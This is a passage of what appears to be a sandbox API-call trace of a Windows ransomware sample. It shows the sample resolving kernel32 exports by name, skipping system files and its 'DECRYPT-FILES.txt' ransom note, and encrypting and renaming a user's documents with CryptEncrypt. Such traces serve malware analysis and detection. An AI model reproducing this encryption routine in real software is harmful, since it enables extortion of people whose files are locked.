lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.543] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.543] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.543] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.543] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.543] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.543] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.543] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.543] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.543] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.543] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.543] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.543] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.543] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.543] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.543] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.544] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.544] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.544] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.544] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.544] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.544] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.544] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.544] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.544] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.544] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.544] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.544] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.544] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.544] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.544] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.544] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.544] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.544] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.544] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.544] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.544] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.544] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.544] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.544] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.544] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.544] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.544] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.544] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.544] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.544] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.545] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\Aoe1mfCdGbGnQ.csv") returned 101 [0084.545] wsprintfW (in: param_1=0x3f2d9ac, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\Aoe1mfCdGbGnQ.csv.l8FrC1N") returned 109 [0084.545] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\Aoe1mfCdGbGnQ.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\hvipcfvk\\aoe1mfcdgbgnq.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\Aoe1mfCdGbGnQ.csv.l8FrC1N" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\hvipcfvk\\aoe1mfcdgbgnq.csv.l8frc1n"), dwFlags=0x0) returned 1 [0084.545] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.545] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.546] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.546] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f87c330, ftCreationTime.dwHighDateTime=0x1d4cf3d, ftLastAccessTime.dwLowDateTime=0x5561350, ftLastAccessTime.dwHighDateTime=0x1d4c5fa, ftLastWriteTime.dwLowDateTime=0x5561350, ftLastWriteTime.dwHighDateTime=0x1d4c5fa, nFileSizeHigh=0x0, nFileSizeLow=0x2df1, dwReserved0=0x0, dwReserved1=0x0, cFileName="AVwBYYGM.csv", cAlternateFileName="")) returned 1 [0084.546] lstrcmpiW (lpString1="AVwBYYGM.csv", lpString2="DECRYPT-FILES.txt") returned -1 [0084.546] lstrcmpiW (lpString1="AVwBYYGM.csv", lpString2="autorun.inf") returned 1 [0084.546] lstrcmpiW (lpString1="AVwBYYGM.csv", lpString2="boot.ini") returned -1 [0084.546] lstrcmpiW (lpString1="AVwBYYGM.csv", lpString2="desktop.ini") returned -1 [0084.546] lstrcmpiW (lpString1="AVwBYYGM.csv", lpString2="ntuser.dat") returned -1 [0084.546] lstrcmpiW (lpString1="AVwBYYGM.csv", lpString2="iconcache.db") returned -1 [0084.546] lstrcmpiW (lpString1="AVwBYYGM.csv", lpString2="bootsect.bak") returned -1 [0084.546] lstrcmpiW (lpString1="AVwBYYGM.csv", lpString2="ntuser.dat.log") returned -1 [0084.546] lstrcmpiW (lpString1="AVwBYYGM.csv", lpString2="thumbs.db") returned -1 [0084.546] lstrcmpiW (lpString1="AVwBYYGM.csv", lpString2="Bootfont.bin") returned -1 [0084.546] lstrlenW (lpString="AVwBYYGM.csv") returned 12 [0084.546] lstrcmpiW (lpString1="csv", lpString2="lnk") returned -1 [0084.546] lstrcmpiW (lpString1="csv", lpString2="exe") returned -1 [0084.546] lstrcmpiW (lpString1="csv", lpString2="sys") returned -1 [0084.546] lstrcmpiW (lpString1="csv", lpString2="dll") returned -1 [0084.546] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\") returned 84 [0084.546] lstrlenW (lpString="AVwBYYGM.csv") returned 12 [0084.546] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\" [0084.546] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpString2="AVwBYYGM.csv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\AVwBYYGM.csv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\AVwBYYGM.csv" [0084.546] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.547] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\AVwBYYGM.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\hvipcfvk\\avwbyygm.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0084.547] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2d978 | out: lpFileSize=0x3f2d978*=11761) returned 1 [0084.547] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0084.547] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.547] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.547] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.547] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.547] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2d8e0*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2d8e0*=0x100) returned 1 [0084.548] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.548] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.548] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.549] CloseHandle (hObject=0x444) returned 1 [0084.549] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.549] WriteFile (in: hFile=0x440, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d900, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2d900*=0x108, lpOverlapped=0x0) returned 1 [0084.550] CloseHandle (hObject=0x0) returned 0 [0084.550] CloseHandle (hObject=0x440) returned 1 [0084.550] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.550] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.550] GetTickCount () returned 0x114d99d [0084.550] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.551] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.551] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.551] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.551] lstrlenA (lpString="kernel32.dll") returned 12 [0084.551] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.551] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.551] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.551] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.551] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.551] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.551] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.551] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.552] lstrlenA (lpString="ADDATOMA") returned 8 [0084.552] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.552] lstrlenA (lpString="ADDATOMW") returned 8 [0084.552] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.552] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.552] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.552] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.552] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.552] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.552] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.552] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.552] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.552] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.552] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.552] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.552] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.552] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.552] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.552] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.552] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.552] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.552] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.552] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.552] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.552] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.552] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.552] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.552] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.552] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.552] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.552] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.552] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.552] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.552] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.552] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.552] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.552] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.552] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.553] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.553] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.553] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.553] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.553] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.553] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.553] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.553] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.553] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.553] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.553] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.553] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.553] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.553] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.553] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.553] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.553] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.553] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.553] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.553] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.553] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.553] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.553] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.553] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.553] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.553] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.553] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.553] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.553] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.553] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.553] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.553] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.553] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.553] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.553] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.553] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.553] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.553] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.553] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.554] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.554] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.554] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.554] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.554] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.554] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.554] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.554] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.554] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.554] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.554] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.554] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.554] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.554] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.554] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.554] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.554] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.554] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.554] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.554] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.554] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.554] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.554] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.554] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.554] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.554] lstrlenA (lpString="BEEP") returned 4 [0084.554] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.554] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.554] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.554] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.554] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.554] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.554] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.554] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.554] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") 